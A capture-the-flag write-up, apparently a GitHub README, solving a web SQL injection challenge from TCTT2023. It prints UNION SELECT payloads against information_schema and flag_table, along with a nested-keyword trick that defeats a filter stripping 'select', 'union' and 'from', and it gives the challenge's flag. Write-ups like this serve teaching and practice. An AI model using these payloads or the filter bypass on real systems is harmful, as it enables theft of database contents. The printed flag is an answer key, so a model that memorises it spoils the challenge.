Skip to content

readme.md

Latest commit

 

History

History
67 lines (38 loc) · 1.28 KB

readme.md

File metadata and controls

67 lines (38 loc) · 1.28 KB

Write-ups for TCTT2023/Web/02

Flag pattern

CTT23{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

Challenge Files

No file provided

Solution

  1. First, let observe the website.

    • Input: select

    web_result_01

    • Input: selectc

    web_result_02

    • Input: selectv

    web_result_03

    • Input: selectz

    web_result_04

From our result, we can clude that, it only replace 'select', 'union', 'from' with ''

  1. We want to know all tables names in the database. So, we can use information_schema.tables to get all tables names.

The original payload is

' UNION SELECT 1,table_name FROM information_schema.columns #

To prevent it from being replaced, we can use SEselectLECT instead of SELECT.

' UNunionION SEselectLECT 1,table_name FRfromOM information_schema.columns #

Table_name_01

Table_name_02

We can see the table named flag_table. Let's get data in this table.

  1. Crafting new payload to get all data in table.
' UNION SELECT * FROM flag_table #

to

' UNunionION SEselectLECT * FRfromOM flag_table #

FLAG

  1. So the flag is CTT23{SQLi_R3p7ac3_F7@g_w1th_NULL}